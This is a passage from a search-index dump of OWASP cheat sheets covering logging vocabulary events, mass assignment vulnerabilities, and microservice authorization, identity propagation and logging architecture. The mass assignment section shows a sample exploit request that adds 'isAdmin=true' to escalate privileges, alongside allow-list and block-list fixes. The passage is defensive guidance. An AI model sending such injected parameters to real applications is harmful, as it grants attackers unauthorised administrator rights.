{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_startup:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 spawned a new instance\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_shutdownuserid","title":"sys_shutdown:[userid]","text":"

Description When a system is shut down it can be valuable to log the event, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_shutdown:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 stopped this instance\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_restartuserid","title":"sys_restart:[userid]","text":"

Description When a system is restarted it can be valuable to log the event, even if the system is serverless or a container, especially if possible to log the user that initiated the system.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_restart:joebob1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 initiated a restart\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_crashreason","title":"sys_crash[:reason]","text":"

Description If possible to catch an unstable condition resulting in the crash of a system, logging that event could be helpful, especially if the event is triggered by an attack.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_crash:outofmemory,\n    \"level\": \"WARN\",\n    \"description\": \"The system crashed due to Out of Memory error.\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_monitor_disableduseridmonitor","title":"sys_monitor_disabled:[userid,monitor]","text":"

Description If your systems contain agents responsible for file integrity, resources, logging, virus, etc. it is especially valuable to know if they are halted and by whom.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_monitor_disabled:joebob1,crowdstrike\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has disabled CrowdStrike\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#sys_monitor_enableduseridmonitor","title":"sys_monitor_enabled:[userid,monitor]","text":"

Description If your systems contain agents responsible for file integrity, resources, logging, virus, etc. it is especially valuable to know if they are started again after being stopped, and by whom.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"sys_monitor_enabled:joebob1,crowdstrike\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has enabled CrowdStrike\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user-management-user","title":"User Management [USER]","text":""},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_createduseridnewuseridattributesonetwothree","title":"user_created:[userid,newuserid,attributes[one,two,three]]","text":"

Description When creating new users, logging the specifics of the user creation event is helpful, especially if new users can be created with administration privileges.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_created:joebob1,user1,admin:create,update,delete\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 created user1 with admin:create,update,delete privilege attributes\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_updateduseridonuseridattributesonetwothree","title":"user_updated:[userid,onuserid,attributes[one,two,three]]","text":"

Description When updating users, logging the specifics of the user update event is helpful, especially if users can be updated with administration privileges.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_updated:joebob1,user1,admin:create,update,delete\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 updated user1 with attributes admin:create,update,delete privilege attributes\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_archiveduseridonuserid","title":"user_archived:[userid,onuserid]","text":"

Description It is always best to archive users rather than deleting, except where required. When archiving users, logging the specifics of the user archive event is helpful. A malicious user could use this feature to deny service to legitimate users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_archived:joebob1,user1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 archived user1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#user_deleteduseridonuserid","title":"user_deleted:[userid,onuserid]","text":"

Description It is always best to archive users rather than deleting, except where required. When deleting users, logging the specifics of the user delete event is helpful. A malicious user could use this feature to deny service to legitimate users.

Level: WARN

Example:

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"event\": \"user_deleted:joebob1,user1\",\n    \"level\": \"WARN\",\n    \"description\": \"User joebob1 has deleted user1\",\n    ...\n}\n
"},{"location":"cheatsheets/Logging_Vocabulary_Cheat_Sheet.html#exclusions","title":"Exclusions","text":"

As important as what you DO log is what you DON'T log. Private or secret information, source code, keys, certs, etc. should never be logged.

For comprehensive overview of items that should be excluded from logging, please see the OWASP Logging Cheat Sheet.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html","title":"Mass Assignment Cheat Sheet","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#introduction","title":"Introduction","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#definition","title":"Definition","text":"

Software frameworks sometime allow developers to automatically bind HTTP request parameters into program code variables or objects to make using that framework easier on developers. This can sometimes cause harm.

Attackers can sometimes use this methodology to create new parameters that the developer never intended which in turn creates or overwrites new variable or objects in program code that was not intended.

This is called a Mass Assignment vulnerability.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#alternative-names","title":"Alternative Names","text":"

Depending on the language/framework in question, this vulnerability can have several alternative names:

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#example","title":"Example","text":"

Suppose there is a form for editing a user's account information:

<form>\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"userid\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"password\" type=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input name=\"email\" text=\"text\">\n\u00a0\u00a0\u00a0\u00a0\u00a0<input type=\"submit\">\n</form>\u00a0\u00a0\n

Here is the object that the form is binding to:

public\u00a0class\u00a0User\u00a0{\nprivate\u00a0String\u00a0userid;\nprivate\u00a0String\u00a0password;\nprivate\u00a0String\u00a0email;\nprivate\u00a0boolean\u00a0isAdmin;\n\n//Getters\u00a0&\u00a0Setters\n}\n

Here is the controller handling the request:

@RequestMapping(value\u00a0=\u00a0\"/addUser\",\u00a0method\u00a0=\u00a0RequestMethod.POST)\npublic\u00a0String\u00a0submit(User\u00a0user)\u00a0{\nuserService.add(user);\nreturn\u00a0\"successPage\";\n}\n

Here is the typical request:

POST\u00a0/addUser\n...\nuserid=bobbytables&password=hashedpass&email=bobby@tables.com\n

And here is the exploit in which we set the value of the attribute isAdmin of the instance of the class User:

POST\u00a0/addUser\n...\nuserid=bobbytables&password=hashedpass&email=bobby@tables.com&isAdmin=true\n
"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#exploitability","title":"Exploitability","text":"

This functionality becomes exploitable when:

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#github-case-study","title":"GitHub case study","text":"

In 2012, GitHub was hacked using mass assignment. A user was able to upload his public key to any organization and thus make any subsequent changes in their repositories. GitHub's Blog Post.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#solutions","title":"Solutions","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#general-solutions","title":"General Solutions","text":"

An architectural approach is to create Data Transfer Objects and avoid binding input directly to domain objects. Only the fields that are meant to be editable by the user are included in the DTO.

public\u00a0class\u00a0UserRegistrationFormDTO\u00a0{\nprivate\u00a0String\u00a0userid;\nprivate\u00a0String\u00a0password;\nprivate\u00a0String\u00a0email;\n\n//NOTE:\u00a0isAdmin\u00a0field\u00a0is\u00a0not\u00a0present\n\n//Getters\u00a0&\u00a0Setters\n}\n
"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#language-framework-specific-solutions","title":"Language & Framework specific solutions","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#spring-mvc","title":"Spring MVC","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing","title":"Allow-listing","text":"
@Controller\npublic\u00a0class\u00a0UserController\n{\n@InitBinder\npublic\u00a0void\u00a0initBinder(WebDataBinder\u00a0binder,\u00a0WebRequest\u00a0request)\n{\nbinder.setAllowedFields([\"userid\",\"password\",\"email\"]);\n}\n...\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing","title":"Block-listing","text":"
@Controller\npublic\u00a0class\u00a0UserController\n{\n@InitBinder\npublic\u00a0void\u00a0initBinder(WebDataBinder\u00a0binder,\u00a0WebRequest\u00a0request)\n{\nbinder.setDisallowedFields([\"isAdmin\"]);\n}\n...\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#nodejs-mongoose","title":"NodeJS + Mongoose","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing_1","title":"Allow-listing","text":"
var\u00a0UserSchema\u00a0=\u00a0new\u00a0mongoose.Schema({\nuserid:\u00a0String,\npassword:\u00a0String,\nemail\u00a0:\u00a0String,\nisAdmin\u00a0:\u00a0Boolean,\n});\n\nUserSchema.statics\u00a0=\u00a0{\nUser.userCreateSafeFields:\u00a0['userid',\u00a0'password',\u00a0'email']\n};\n\nvar\u00a0User\u00a0=\u00a0mongoose.model('User',\u00a0UserSchema);\n\n_\u00a0=\u00a0require('underscore');\nvar\u00a0user\u00a0=\u00a0new\u00a0User(_.pick(req.body,\u00a0User.userCreateSafeFields));\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing_1","title":"Block-listing","text":"
var\u00a0massAssign\u00a0=\u00a0require('mongoose-mass-assign');\n\nvar\u00a0UserSchema\u00a0=\u00a0new\u00a0mongoose.Schema({\nuserid:\u00a0String,\npassword:\u00a0String,\nemail\u00a0:\u00a0String,\nisAdmin\u00a0:\u00a0{\u00a0type:\u00a0Boolean,\u00a0protect:\u00a0true,\u00a0default:\u00a0false\u00a0}\n});\n\nUserSchema.plugin(massAssign);\n\nvar\u00a0User\u00a0=\u00a0mongoose.model('User',\u00a0UserSchema);\n\n/**\u00a0Static\u00a0method,\u00a0useful\u00a0for\u00a0creation\u00a0**/\nvar\u00a0user\u00a0=\u00a0User.massAssign(req.body);\n\n/**\u00a0Instance\u00a0method,\u00a0useful\u00a0for\u00a0updating**/\nvar\u00a0user\u00a0=\u00a0new\u00a0User;\nuser.massAssign(req.body);\n\n/**\u00a0Static\u00a0massUpdate\u00a0method\u00a0**/\nvar\u00a0input\u00a0=\u00a0{\u00a0userid:\u00a0'bhelx',\u00a0isAdmin:\u00a0'true'\u00a0};\nUser.update({\u00a0'_id':\u00a0someId\u00a0},\u00a0{\u00a0$set:\u00a0User.massUpdate(input)\u00a0},\u00a0console.log);\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#ruby-on-rails","title":"Ruby On Rails","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#django","title":"Django","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#asp-net","title":"ASP NET","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#php-laravel-eloquent","title":"PHP Laravel + Eloquent","text":""},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#allow-listing_2","title":"Allow-listing","text":"
<?php\n\nnamespace\u00a0App;\n\nuse\u00a0Illuminate\\Database\\Eloquent\\Model;\n\nclass\u00a0User\u00a0extends\u00a0Model\n{\n    private\u00a0$userid;\n    private\u00a0$password;\n    private\u00a0$email;\n    private\u00a0$isAdmin;\n\n    protected\u00a0$fillable\u00a0=\u00a0array('userid','password','email');\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#block-listing_2","title":"Block-listing","text":"
<?php\n\nnamespace\u00a0App;\n\nuse\u00a0Illuminate\\Database\\Eloquent\\Model;\n\nclass\u00a0User\u00a0extends\u00a0Model\n{\n    private\u00a0$userid;\n    private\u00a0$password;\n    private\u00a0$email;\n    private\u00a0$isAdmin;\n\n    protected\u00a0$guarded\u00a0=\u00a0array('isAdmin');\n}\n

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#grails","title":"Grails","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#play","title":"Play","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#jackson-json-object-mapper","title":"Jackson (JSON Object Mapper)","text":"

Take a look here and here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#gson-json-object-mapper","title":"GSON (JSON Object Mapper)","text":"

Take a look here and here for the document.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#json-lib-json-object-mapper","title":"JSON-Lib (JSON Object Mapper)","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#flexjson-json-object-mapper","title":"Flexjson (JSON Object Mapper)","text":"

Take a look here for the documentation.

"},{"location":"cheatsheets/Mass_Assignment_Cheat_Sheet.html#references-and-future-reading","title":"References and future reading","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html","title":"Microservices Security Cheat Sheet","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The microservice architecture is being increasingly used for designing and implementing application systems in both cloud-based and on-premise infrastructures, high-scale applications and services. There are many security challenges need to be addressed in the application design and implementation phases. The fundamental security requirements that have to be addressed during design phase are authentication and authorization. Therefore, it is vital for applications security architects to understand and properly use existing architecture patterns to implement authentication and authorization in microservices-based systems. The goal of this cheat sheet is to identify such patterns and to do recommendations for applications security architect on possible way to use it.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#edge-level-authorization","title":"Edge-level authorization","text":"

In simple scenario, authorization can happen only at the edge level (API gateway). The API gateway can be leveraged to centralize enforcement of authorization for all downstream microservices, eliminating the need to provide authentication and access control for each of the individual services. In such case, NIST recommends to implement mitigating controls such as mutual authentication to prevent direct, anonymous connections to the internal services (API gateway bypass). It should be noted that authorization at the edge layer has a following limitations:

In most cases, development teams implement authorization in both places -- at the edge level at a coarse level of granularity and service level. To authenticate external entity edge can use access tokens (referenced token or self-contained token) transmitted via HTTP headers (e.g. \u201cCookie\u201d or \u201cAuthorization\u201d) or use mTLS.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-level-authorization","title":"Service-level authorization","text":"

Service-level authorization gives each microservice more control to enforce access control policies. For further discussion, we use terms and definitions according with NIST SP 800-162. The functional components of access control system can be classified following way:

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-level-authorization-existing-patterns","title":"Service-level authorization: existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#decentralized-pattern","title":"Decentralized pattern","text":"

Development team implements PDP and PEP directly at microservice code level. All the access control rules and as well as attributes that need to implement that rule are defined and stored on the each microservice (step 1). When microservice receives (step 2) request along with some authorization metadata (e.g., end user context or requested resource ID), microservice analyzes it (step 3) in order to generate access control policy decision and then enforces authorization (step 4). Existing programming language frameworks allow development teams to implement authorization at the microservice layer. E.g., Spring Security allows developers to enable scopes checking (e.g. using scopes extracted from incoming JWT) in the resource server and use it to enforce authorization. Implementing authorization at the source code level means that the code must be updated whenever development team want to modify authorization logic.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#centralized-pattern-with-single-policy-decision-point","title":"Centralized pattern with single policy decision point","text":"

In that pattern access control rules are defined, stored, and evaluated centrally. Access control rules is defined using PAP (step 1) and delivered to centralized PDP as well as attributes that need to implement that rules (step 2). When a subject invokes microservice endpoint (step 3), microservice code invokes centralized PDP via network call and PDP generates access control policy decision by evaluating the query input against access control rules and attributes (step 4). Based on PDP decision microservice enforce authorization (step 5). To define access control rules development/operation team has to use some language or notation. An example is Extensible Access Control Markup Language (XACML) and Next Generation Access Control (NGAC) that is a standard to implement policy rules description. This pattern badly affects latency due additional network calls of the remote PDP endpoint, but it can be mitigated by caching authorization policy decisions at microservice level. It should be mentioned that PDP must be operated in high-availability mode due to resilience and availability issues. Application security architects should combine it with other patterns (e.g., authorization on API gateway level) in order to enforce \u201cdefense in depth\u201d principle.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#centralized-pattern-with-embedded-policy-decision-point","title":"Centralized pattern with embedded policy decision point","text":"

In that pattern access control rules are defined centrally but stored and evaluated at microservice level. Access control rules is defined using PAP (step 1) and delivered to embedded PDP as well as attributes that need to implement that rules (step 2). When a subject invokes microservice endpoint (step 3), microservice code invokes PDP and PDP generates access control policy decision by evaluating the query input against access control rules and attributes (step 4). Based on PDP decision microservice enforce authorization (step 5). PDP code in that case can be implemented as microservice built-in library or sidecar in service mesh architecture. Due to possible network/host failures and network latency it is advisable to implement embedded PDP as microservice library or sidecar on the same host with microservice. Embedded PDP usually store authorization policy and policy-related data in-memory to minimize external dependencies during authorization enforcement and get low latency. Main difference from \u201cCentralized pattern with single policy decision point\u201d with caching approach is that authorization decisions do not store on the microservice side, up to date authorization policy are stored on microservice side instead. It should be mentioned that caching authorization decisions may lead to applying outdated authorization rules and access control violations. Netfix presented (link, link) a real case of using \u201cCentralized pattern with embedded PDP\u201d pattern to implement authorization on the microservices level.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#recommendation-on-how-to-implement-authorization","title":"Recommendation on how to implement authorization","text":"
  1. To achieve scalability it is not advisable to hardcode authorization policy in source code (decentralized pattern), but use special language to express policy instead. The goal is to externalize/decouple authorization from code, and not just with a gateway/proxy that acts as a checkpoints. Recommended pattern for service-level authorization is \u201cCentralized pattern with embedded PDP\u201d due to its resilience and wide adoption.
  2. Authorization solution should be platform-level solution; dedicated team (e.g., Platform security team) must be accountable for development and operation of authorization solution as well as sharing microservice blueprint/library/components that implement authorization among development teams.
  3. Authorization solution should be based on widely used solution, because implementing custom solution has following cons:
  4. There is a probability that not all access control policy can be enforced by gateways/proxies and shared authorization library/components, so some specific access control rules still have to be implemented on microservice business code level. In order to do that it is advisiable to have and use by microservice development teams simple questionary/check-list to uncover such security requriments and handle its properly during microservice development.
  5. It is advisable to implement \u201cdefense in depth\u201d principle enforce authorization on:
  6. Access control policy formal procedures like development, approval, rolling-out must be implemented.
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#external-entity-identity-propagation","title":"External entity identity propagation","text":"

To make fine-granted authorization decision at the microservice level, microservice has to understand caller context (e.g. user ID, user roles/groups). In order to allow internal service layer to enforce authorization, edge layer has to propagate authenticated external entity identity (e.g., end user context) along with a request to downstream microservices. One of the simplest way to propagate external entity identity is to re-use the access token received by the edge and pass it to internal microservices. It should be mentioned that approach is highly insecure due to possible external access token leakage and may increase an attack surface because the communication relies on proprietary token-based system implementation: If an internal service is unintentionally exposed to the external network, then it can be directly accessed using the leaked access token. This attack is not possible if the internal service only accepts a token format known only to internal services. This pattern also is not external access token agnostic, i.e. internal services have to understand external access token and support a wide range of authentication techniques to extract identity from different types of external tokens (e.g. JWT, cookie, OpenID Connect token).

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#identity-propagation-existing-patterns","title":"Identity propagation: existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#send-the-external-entity-identity-as-a-clear-or-self-signed-data-structures","title":"Send the external entity identity as a clear or self-signed data structures","text":"

In that approach calling microservice extracts external entity identity from incoming request (e.g. via parsing incoming access token), creates data structure (e.g. JSON or self-signed JWT) with context and passes that on to an internal microservices. In this scenario recipient microservice has to trust the calling microservice -- if the calling microservice want to violate access control rules, it can do so by setting any user/client ID or user roles it wants as the HTTP header. That approach is applicable in a highly trusted environment in which every microservice is developed by trusted development team according with secure software development practices.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#using-a-data-structures-signed-by-a-trusted-issuer","title":"Using a data structures signed by a trusted issuer","text":"

In this pattern after the external request is authenticated by authentication service at the edge layer, a data structure representing external entity identity (e.g., contained user ID, user roles/groups or permissions) is generated, signed or encrypted by the trusted issuer and propagated to internal microservices.

Netflix presented a real case of using that pattern: structure called \u201cPassport\u201d that contains user ID and its attributes and HMAC protected is created at the edge level for each incoming request, propagated to internal microservices and never exposes outside:

  1. Edge authentication service (EAS) obtains secret key from the Key Management System.
  2. EAS receives an access token (may be e.g. in a cookie, JWT, OAuth2 token) from incoming request.
  3. EAS decrypts the access token, resolves the external entity identity and sends it to the internal services in the signed \u201cPassport\u201d structure.
  4. Internal services can extract user identity in order to enforce authorization (e.g. to implement identity-based authorization) using wrappers.
  5. If necessary, internal service can propagate \u201cPassport\u201d structure to downstream services in the call chain.

It should be mentioned that pattern is external access token agnostic and allows to decouple external entity and its internal representation.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#recommendation-on-how-to-implement-identity-propagation","title":"Recommendation on how to implement identity propagation","text":"
  1. In order to implement external access token agnostic and extendable system decouple access tokens issued for external entity from its internal representation. Use single data structure to represent and propagate external entity identity among microservices. Edge-level service has to verify incoming external access token, issue internal entity representation structure and propagate it to downstream services.
  2. Using an internal entity representation structure signed (symmetric or asymmetric encryption) by a trusted issuer is recommended pattern adopted by community.
  3. Internal entity representation structure should be extensible to enable add more claims that may lead to low latency.
  4. Internal entity representation structure must not be exposed outside (e.g., to browser or external device).
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-to-service-authentication","title":"Service-to-service authentication","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#existing-patterns","title":"Existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#mutual-transport-layer-security","title":"Mutual transport layer security","text":"

In mTLS approach each microservice can legitimately identify who it talks to, in addition to achieving confidentiality and integrity of the transmitted data. Each microservice in the deployment has to carry a public/private key pair and uses that key pair to authenticate to the recipient microservices via mTLS. mTLS usually is implemented with a self-hosted Public Key Infrastructure. The main challenges using mTLS are: key provisioning and trust bootstrap, certificate revocation and key rotation.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#token-based","title":"Token based","text":"

Token based approach works at the application layer. Token is a container and may contain caller ID (microservice ID) and its permissions (scopes). Caller microservice can obtain signed token by invoking special security token service using its own service ID and password and then attaches it to every outgoing requests e.g., via HTTP headers. Called microservice can extract token and validate it online or offline.

  1. Online scenario:
  2. Offline scenario:
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Logging services in microservice-based systems aim to meet the principle of accountability and traceability and help detect security anomalies in operations via log analysis. Therefore, it is vital for application security architects to understand and adequately use existing architecture patterns to implement audit logging in microservices-based systems for security operations. A high-level architecture design is shown in the picture below and based on the following principles:

High-level recommendations to logging subsystem architecture with its rationales are listed below.

  1. Microservice shall not send log messages directly to the central logging subsystem using network communication. Microservice shall write its log message to a local log file:
  2. There shall be a dedicated component (logging agent) decoupled from the microservice. The logging agent shall collect log data on the microservice (read local log file) and send it to the central logging subsystem. Due to possible network latency issues, the logging agent shall be deployed on the same host (virtual or physical machine) with the microservice:
  3. A possible DoS attack on the central logging subsystem logging agent shall not use an asynchronous request/response pattern to send log messages. There shall be a message broker to implement the asynchronous connection between the logging agent and central logging service:
  4. Logging agent and message broker shall use mutual authentication (e.g., based on TLS) to encrypt all transmitted data (log messages) and authenticate themselves:
  5. Message broker shall enforce access control policy to mitigate unauthorized access and implement the principle of least privileges:
  6. Logging agent shall filter/sanitize output log messages to sensitive data (e.g., PII, passwords, API keys) will never send to the central logging subsystem (data minimization principle). For a comprehensive overview of items that should be excluded from logging, please see the OWASP Logging Cheat Sheet.
  7. Microservices shall generate a correlation ID that uniquely identifies every call chain and helps group log messages to investigate them. The logging agent shall include a correlation ID in every log message.
  8. Logging agent shall periodically provide health and status data to indicate its availability or non-availability.
  9. Logging agent shall publish log messages in structured logs format (e.g., JSON, CSV).
  10. Logging agent shall append log messages with context data, e.g., platform context (hostname, container name), runtime context (class name, filename).

For comprehensive overview of events that should be logged and possible data format, please see the OWASP Logging Cheat Sheet and Application Logging Vocabulary Cheat Sheet

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html","title":"Microservices based Security Arch Doc Cheat Sheet","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The microservice architecture is being increasingly used for designing and implementing application systems in both cloud-based and on-premise infrastructures. There are many security challenges need to be addressed in the application design and implementation phases. In order to address some security challenges it is necessity to collect security-specific information on application architecture. The goal of this article is to provide a concrete proposal of approach to collect microservice-based architecture information to securing application.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#context","title":"Context","text":"

During securing applications based on microservices architecture, security architects/engineers usually face with the following questions (mostly referenced in the OWASP Application Security Verification Standard Project under the section V1 \"Architecture, Design and Threat Modeling Requirements\"):

  1. Threat modeling and enforcement of the principle of least privilege:
  2. Data leakage analysis:
  3. Attack surface analysis:

In most cases, existing application architecture documentation is not suitable to answer those questions. Next sections propose what architecture security-specific information can be collected to answer the questions above.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#objective","title":"Objective","text":"

The objectives of the cheat sheet are to explain what architecture security-specific information can be collected to answer the questions above and provide concrete proposal of approach to collect microservice-based architecture information to securing application.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#proposition","title":"Proposition","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#collect-information-on-the-building-blocks","title":"Collect information on the building blocks","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-application-functionality-services","title":"Identify and describe application-functionality services","text":"

Application-functionality services implement one or several business process or functionality (e.g., storing customer details, storing and displaying product catalog). Collect information on the parameters listed below related to each application-functionality service.

Parameter name Description Service name (ID) Unique service name or ID Short description Short description of business process or functionality implemented by the microservice Link to source code repository Specify a link to service source code repository Development Team Specify development team which develops the microservice API definition If microservice exposes external interface specify a link to the interface description (e.g., OpenAPI specification). It is advisable to define used security scheme, e.g. define scopes or API keys needed to invoke dedicated endpoint (e.g., see). The microservice architecture description Specify a link to the microservice architecture diagram, description (if available) Link to runbook Specify a link to the microservice runbook"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-infrastructure-services","title":"Identify and describe infrastructure services","text":"

Infrastructure services including remote services may implement authentication, authorization, service registration and discovery, security monitoring, logging etc. Collect information on the parameters listed below related to each infrastructure service.

Parameter name Description Service name (ID) Unique service name or ID Short description Short description of functionality implemented by the service (e.g., authentication, authorization, service registration and discovery, logging, security monitoring, API gateway). Link to source code repository Specify a link to service source code repository (if applicable) Link to the service documentation Specify a link to the service documentation that includes service API definition, operational guidance/runbook, etc."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-data-storages","title":"Identify and describe data storages","text":"

Collect information on the parameters listed below related to each data storage.

Parameter name Description Storage name (ID) Unique storage name or ID Software type Specify software that implements the data storage (e.g., PostgreSQL, Redis, Apache Cassandra)."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-message-queues","title":"Identify and describe message queues","text":"

Messaging systems (e.g., RabbitMQ or Apache Kafka) are used to implement asynchronous microservices communication mechanism. Collect information on the parameters listed below related to each message queue.

Parameter name Description Message queue (ID) Unique message queue name or ID Software type Specify software that implements the message queue (e.g., RabbitMQ, Apache Kafka)."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-data-assets","title":"Identify and describe data assets","text":"

Identify and describe data assets that processed by system microservices/services. It is advisable firstly to identify assets, which are valuable from a security perspective (e.g., \"User information\", \"Payment\"). Collect information on the parameters listed below related to each asset.

Parameter name Description Asset name (ID) Unique asset name or ID Protection level Specify asset protection level (e.g., PII, confidential) Additional info Add clarifying information"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#collect-information-on-relations-between-building-blocks","title":"Collect information on relations between building blocks","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-storage-relations","title":"Identify \"service-to-storage\" relations","text":"

Collect information on the parameters listed below related to each \"service-to-storage\" relation.

